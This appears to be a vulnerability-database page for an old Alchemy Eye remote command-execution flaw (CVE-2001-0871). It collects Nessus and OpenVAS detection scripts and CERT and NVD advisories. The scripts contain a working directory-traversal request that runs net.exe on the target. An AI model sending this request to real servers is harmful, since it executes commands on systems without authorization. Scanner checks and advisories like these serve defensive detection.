Search...

Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution

2001-12-03T00:00:00

ID ALCHEMY_EYE_HTTP.NASL
Type nessus
Reporter Tenable
Modified 2018-06-13T00:00:00

Description

Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.

                                        
                                            #
# This script was written by Drew Hintz ( http://guh.nu )
#
# It is based on scripts written by Renaud Deraison and  HD Moore
#
# See the Nessus Scripts License for details
#

# Changes by Tenable:
# - Description whitespace touch-up, added see-also (3/15/10)

include("compat.inc");

if (description)
{
 script_id(10818);
 script_version("1.25");
 script_cvs_date("Date: 2018/06/13 18:56:25");

 script_cve_id("CVE-2001-0871");
 script_bugtraq_id(3599);

 script_name(english:"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution");
 script_summary(english:"Determine if arbitrary commands can be executed by Alchemy Eye");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a remote command execution
vulnerability.");
 script_set_attribute(attribute:"description", value:
"Alchemy Eye and Alchemy Network Monitor are network management tools
for Microsoft Windows. The product contains a built-in HTTP server for
remote monitoring and control. This HTTP server allows arbitrary
commands to be run on the server by a remote attacker.");
 script_set_attribute(attribute:"see_also", value:"http://www.rapid7.com/security-center/advisories/R7-0001.jsp");
 script_set_attribute(attribute:"solution", value:
"Either disable HTTP access in Alchemy Eye, or require authentication
for Alchemy Eye. Both of these can be set in the Alchemy Eye
preferences.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/11/29");
 script_set_attribute(attribute:"plugin_publication_date", value:"2001/12/03");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 H D Moore & Drew Hintz ( http://guh.nu )");
 script_family(english:"CGI abuses");
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_keys("www/alchemy");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);

function check(req)
{
 local_var r, pat;

 req = http_get(item:req, port:port);
 r = http_keepalive_send_recv(port:port, data:req);
 if ( r == NULL ) exit(0);
 pat = "ACCOUNTS | COMPUTER";
 if(pat &gt;&lt; r) {
   	security_hole(port:port);
	exit(0);
 	}
 return(0);
}

dir[0] = "/PRN";
dir[1] = "/NUL";
dir[2] = "";

for(d=0;dir[d];d=d+1)
{
	url = string("/cgi-bin", dir[d], "/../../../../../../../../WINNT/system32/net.exe");
	check(req:url);
}

JSON Vulners Source

Initial Source

{"id": "ALCHEMY_EYE_HTTP.NASL", "bulletinFamily": "scanner", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "description": "Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.", "published": "2001-12-03T00:00:00", "modified": "2018-06-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=10818", "reporter": "Tenable", "references": ["http://www.rapid7.com/security-center/advisories/R7-0001.jsp"], "cvelist": ["CVE-2001-0871"], "type": "nessus", "lastseen": "2018-06-14T07:07:27", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2001-0871"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "cc6b247f5915bfc125cf928b3908fb439feb37cf35243876ad006b944179f898", "hashmap": [{"hash": "913199275deb4b08b20791179a956fee", "key": "description"}, {"hash": "4767242db8b428b5df9795984021bfec", "key": "sourceData"}, {"hash": "63591426e22db15e82f2db7c72df67f7", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20042e8197ebfa32140db30dbe4e8232", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fb6e7c396949fea1f6f6bf144dbc7908", "key": "pluginID"}, {"hash": "18f90f95e216ec0aa7ae6d3399e69fb9", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "cb4e12a5a1e930b1212b619cf4f1abbc", "key": "modified"}, {"hash": "9b43e042c3fda0521e383922c2b467e1", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "4a31c034a204ef6ae9ba01972875fa44", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=10818", "id": "ALCHEMY_EYE_HTTP.NASL", "lastseen": "2016-09-26T17:23:38", "modified": "2014-01-07T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "10818", "published": "2001-12-03T00:00:00", "references": ["http://www.rapid7.com/security-center/advisories/R7-0001.jsp"], "reporter": "Tenable", "sourceData": "#\n# This script was written by Drew Hintz ( http://guh.nu )\n#\n# It is based on scripts written by Renaud Deraison and HD Moore\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Description whitespace touch-up, added see-also (3/15/10)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10818);\n script_version(\"$Revision: 1.24 $\");\n script_cvs_date(\"$Date: 2014/01/07 21:38:30 $\");\n\n script_cve_id(\"CVE-2001-0871\");\n script_bugtraq_id(3599);\n script_osvdb_id(684);\n\n script_name(english:\"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution\");\n script_summary(english:\"Determine if arbitrary commands can be executed by Alchemy Eye\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0001.jsp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable HTTP access in Alchemy Eye, or require authentication\nfor Alchemy Eye. Both of these can be set in the Alchemy Eye\npreferences.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2014 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port))exit(0);\n\nfunction check(req)\n{\n local_var r, pat;\n\n req = http_get(item:req, port:port);\n r = http_keepalive_send_recv(port:port, data:req);\n if ( r == NULL ) exit(0);\n pat = \"ACCOUNTS | COMPUTER\";\n if(pat >< r) {\n \tsecurity_hole(port:port);\n\texit(0);\n \t}\n return(0);\n}\n\ndir[0] = \"/PRN\";\ndir[1] = \"/NUL\";\ndir[2] = \"\";\n\nfor(d=0;dir[d];d=d+1)\n{\n\turl = string(\"/cgi-bin\", dir[d], \"/../../../../../../../../WINNT/system32/net.exe\");\n\tcheck(req:url);\n}\n", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:23:38"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "9b43e042c3fda0521e383922c2b467e1"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "913199275deb4b08b20791179a956fee"}, {"key": "href", "hash": "18f90f95e216ec0aa7ae6d3399e69fb9"}, {"key": "modified", "hash": "5299677d29a0b2004584ce465e834b3e"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "fb6e7c396949fea1f6f6bf144dbc7908"}, {"key": "published", "hash": "4a31c034a204ef6ae9ba01972875fa44"}, {"key": "references", "hash": "20042e8197ebfa32140db30dbe4e8232"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "5ed7a2422002f4feb3361f205a9e3d5f"}, {"key": "title", "hash": "63591426e22db15e82f2db7c72df67f7"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "cba35269a96afdb4da75319e888e56333d9139ae35a63ded55e258ed3049b6eb", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# This script was written by Drew Hintz ( http://guh.nu )\n#\n# It is based on scripts written by Renaud Deraison and HD Moore\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Description whitespace touch-up, added see-also (3/15/10)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10818);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/06/13 18:56:25\");\n\n script_cve_id(\"CVE-2001-0871\");\n script_bugtraq_id(3599);\n\n script_name(english:\"Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution\");\n script_summary(english:\"Determine if arbitrary commands can be executed by Alchemy Eye\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Alchemy Eye and Alchemy Network Monitor are network management tools\nfor Microsoft Windows. The product contains a built-in HTTP server for\nremote monitoring and control. This HTTP server allows arbitrary\ncommands to be run on the server by a remote attacker.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0001.jsp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable HTTP access in Alchemy Eye, or require authentication\nfor Alchemy Eye. Both of these can be set in the Alchemy Eye\npreferences.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2001-2018 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port))exit(0);\n\nfunction check(req)\n{\n local_var r, pat;\n\n req = http_get(item:req, port:port);\n r = http_keepalive_send_recv(port:port, data:req);\n if ( r == NULL ) exit(0);\n pat = \"ACCOUNTS | COMPUTER\";\n if(pat >< r) {\n \tsecurity_hole(port:port);\n\texit(0);\n \t}\n return(0);\n}\n\ndir[0] = \"/PRN\";\ndir[1] = \"/NUL\";\ndir[2] = \"\";\n\nfor(d=0;dir[d];d=d+1)\n{\n\turl = string(\"/cgi-bin\", dir[d], \"/../../../../../../../../WINNT/system32/net.exe\");\n\tcheck(req:url);\n}\n", "naslFamily": "CGI abuses", "pluginID": "10818", "cpe": []}

{"result": {"cve": [{"lastseen": "2017-12-19T12:21:03", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/7625", "http://www.kb.cert.org/vuls/id/220715", "http://marc.info/?l=bugtraq&m=100714173510535&w=2", "http://www.securityfocus.com/bid/3599", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7626"], "description": "Directory traversal vulnerability in HTTP server for Alchemy Eye and Alchemy Network Monitor allows remote attackers to execute arbitrary commands via an HTTP request containing (1) a .. in versions 2.0 through 2.6.18, or (2) a DOS device name followed by a .. in versions 2.6.19 through 3.0.10.", "edition": 4, "reporter": "NVD", "published": "2001-12-21T00:00:00", "title": "CVE-2001-0871", "type": "cve", "enchantments": {"score": {"modified": "2017-12-19T12:21:03", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2001-0871"], "scanner": [], "modified": "2017-12-18T21:29:28", "cpe": ["cpe:/a:alchemy_lab:alchemy_eye:2.6", "cpe:/a:alchemy_lab:alchemy_eye:2.0", "cpe:/a:alchemy_lab:alchemy_eye:2.6.19", "cpe:/a:alchemy_lab:alchemy_eye:3.0", "cpe:/a:alchemy_lab:alchemy_eye:2.4", "cpe:/a:alchemy_lab:alchemy_eye:2.1", "cpe:/a:alchemy_lab:alchemy_eye:2.3", "cpe:/a:alchemy_lab:alchemy_eye:2.2", "cpe:/a:alchemy_lab:alchemy_eye:2.6.18", "cpe:/a:dek_software:alchemy_network_monitor:3.0.10", "cpe:/a:alchemy_lab:alchemy_eye:2.5", "cpe:/a:alchemy_lab:alchemy_eye:3.0.10"], "id": "CVE-2001-0871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0871", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2016-02-03T09:12:49", "references": ["http://www.rapid7.com/advisories/R7-0001.txt", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2001-0871", "http://www.deksoftware.com/alchemy/", "http://www.alchemy-lab.com/products/eye/", "http://www.securityfocus.com/bid/3599"], "description": "### Overview\n\nAlchemy Eye does not properly validate HTTP requests, allowing arbitrary command execution.\n\n### Description\n\nAlchemy Eye includes an HTTP server for remote system monitoring and control. In versions 2.0 through 2.6 of Alchemy Eye, the HTTP server component does not adequately validate HTTP requests, allowing attackers to execute arbitrary commands. \n \n--- \n \n### Impact\n\nRemote attackers can execute arbitrary commands on the server. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of a practical solution to this problem. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nAlchemy Lab| | -| 25 Sep 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23220715 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.rapid7.com/advisories/R7-0001.txt>\n * <http://www.securityfocus.com/bid/3599>\n * <http://www.alchemy-lab.com/products/eye/>\n * <http://www.deksoftware.com/alchemy/>\n\n### Credit\n\nThanks to Rapid 7 for reporting this vulnerability.\n\nThis document was written by Shawn Van Ittersum.\n\n### Other Information\n\n * CVE IDs: [CAN-2001-0871](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2001-0871>)\n * Date Public: 29 Nov 2001\n * Date First Published: 27 Sep 2002\n * Date Last Updated: 18 Sep 2003\n * Severity Metric: 6.50\n * Document Revision: 6\n\n", "edition": 1, "reporter": "CERT", "published": "2002-09-27T00:00:00", "title": "Alchemy Eye HTTP Server does not adequately validate user input thereby allowing remote command execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cert", "bulletinFamily": "info", "cvelist": ["CVE-2001-0871", "CVE-2001-0871"], "modified": "2003-09-18T00:00:00", "id": "VU:220715", "href": "https://www.kb.cert.org/vuls/id/220715", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:06", "references": ["http://www.securityfocus.com/archive/1/243404"], "pluginID": "136141256231010818", "description": "Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.\n (Taken from the security announcement by http://www.rapid7.com.)", "edition": 1, "reporter": "This script is Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )", "published": "2005-11-03T00:00:00", "title": "Alchemy Eye HTTP Command Execution", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0871"], "modified": "2017-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010818", "id": "OPENVAS:136141256231010818", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alchemy_eye_http.nasl 5901 2017-04-09 13:17:48Z cfi $\n#\n# Description: Alchemy Eye HTTP Command Execution\n#\n# Authors:\n# Drew Hintz ( http://guh.nu )\n# Based on scripts written by Renaud Deraison and HD Moore\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10818\");\n script_version(\"$Revision: 5901 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-09 15:17:48 +0200 (Sun, 09 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3599);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0871\");\n script_name(\"Alchemy Eye HTTP Command Execution\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_mandatory_keys(\"www/alchemy\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/243404\");\n\n tag_summary = \"Alchemy Eye and Alchemy Network Monitor are network management\n tools for Microsoft Windows. The product contains a built-in HTTP\n server for remote monitoring and control. This HTTP server allows\n arbitrary commands to be run on the server by a remote attacker.\n (Taken from the security announcement by http://www.rapid7.com.)\";\n\n tag_solution = \"Either disable HTTP access in Alchemy Eye, or require\n authentication for Alchemy Eye. Both of these can be set in the\n Alchemy Eye preferences.\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"solution\", value:tag_solution);\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list( \"/PRN\", \"/NUL\", \"\" ) ) {\n\n url = string(\"/cgi-bin\", dir, \"/../../../../../../../../WINNT/system32/net.exe\");\n\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n if( isnull( res ) ) continue;\n\n if( \"ACCOUNTS | COMPUTER\" >< res ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.alchemy-lab.com/\nSnort Signature ID: 1505\nSnort Signature ID: 1506\n[CVE-2001-0871](https://vulners.com/cve/CVE-2001-0871)\nBugtraq ID: 3599\n", "reporter": "OSVDB", "published": "2001-11-29T00:00:00", "title": "Alchemy Eye/Network Monitor Traversal Arbitrary Command Execution", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2001-0871"], "modified": "2001-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:684", "id": "OSVDB:684", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}}